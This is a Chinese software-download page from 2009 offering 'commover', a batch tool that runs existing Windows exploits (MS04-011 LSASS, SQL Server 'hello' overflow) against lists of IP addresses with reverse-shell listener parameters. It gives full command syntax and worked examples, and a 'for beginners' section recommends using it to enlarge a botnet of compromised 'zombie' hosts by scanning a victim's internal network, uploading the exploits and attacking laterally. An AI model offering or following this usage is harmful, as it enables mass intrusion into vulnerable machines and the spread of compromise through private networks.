<
您还没有登录┊登录注册 当前在线:627
源码程序系统工具编程开发图形图像网络软件应用软件多媒体类娱乐休闲驱动程序各类教程各类论文文章阅读
ASPPHPJSPASP.NETVBVF百度搜索星星练题网络文摘股市消息技能习题详细分类
当前位置:首页 \ 系统工具 \ 系统安全
站内搜索


通用批量溢出利用工具CMD版

文件大小:159 KB 点击放大
运行平台:Windows9X/ME/NT/2000/XP
级别评定:
添加时间:2009-4-3 23:37:44
最后更新:2009-4-3 23:37:44
相关链接:无
所需金额:0 元
添加者:管理员

Download.1

/ ::软件简介:: / ::相关软件:: / ::软件点评:: /::上一个::/ ::下一个:: /
管理首页
用法:

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
Usage: commover [head] file after exp
head------EXP的前缀参数(多个参数需要用双引号刮起来)
file------保存攻击IP的文件的全名(.txt)
after------EXP的后缀参数(多个参数需要用双引号刮起来)
exp------exp的文件全名(.exe)
有前缀参数:comover 0 file.txt "1234 192.168.0.253" ms04011.exe

无前缀参数:comover file.txt "1433 192.168.0.253 1234" sqlhello.exe

具体的例子:(有前缀参数的)
比如利用MS04-011.exe,存在漏洞的主机IP存在lsass.txt中,利用返回模式进行攻击
监听端口:1234 我本地的监听IP:192.168.0.253 具体的EXP攻击程序:ms04011.exe
那么具体参数就是这样:comover 0(1) lsass.txt "1234 192.168.0.253" ms04011.exe


具体的例子:(无前缀参数的)
比如利用SQL 1433端口的hello溢出sqlhello.exe,存在漏洞的主机IP存在1433.txt中,
监听端口:1234 我本地的监听IP:192.168.0.253 具体的EXP攻击程序:sqlhello.exe
那么具体参数就是这样:comover 1433.txt "1433 192.168.0.253 1234" sqlhello.exe
大致用法就是这样,对不同的exp程序应该根据具体的EXP用法使用;

不过特别要主义的是,当前缀或者后缀参数有多个参数的时候一定要用双用好包括起来;
file.txt里面一行只能保存一个IP。

写给菜鸟:
这个东西我认为用来扩大自己的肉鸡是非常有用的,比如我通过SQL的hello溢出得到
192.168.111.23的一台肉鸡,那么我们就可以通过其他的漏洞
比如MS04011,我们可以先利用rootshell写的那个scanner对其内网进行扫描,得到结
果lsass.txt
下载下来编辑去掉后面无用的信息,在传上去,然后把MS04011.EXE 传到肉鸡上面,
在利用这个commover.exe进行攻击,相信你会得到很意外的收获,哈哈!

相关软件
·discuz!6.0.0漏洞
·通用批量溢出程序 Ver1.2
·用360修复漏洞后老是出现ms06-014的补丁装不上的解决办法 


1分 0
2分 0
3分 0
4分 0
5分 0
共有 0 人打分
平均得分:0


按字符查询:ABCDEFGHIJKLMNOPQRSTUVWXYZ0~9中文
下载图示: - 附汉化补丁 - 附注册 - 会员软件 - 推荐 - 最新添加
Rainight, 星旺坡 联网备案号:41092802000212 豫ICP备19032584号-1 页面执行时间: 0.13秒
业务QQ:80571569 手机:13030322310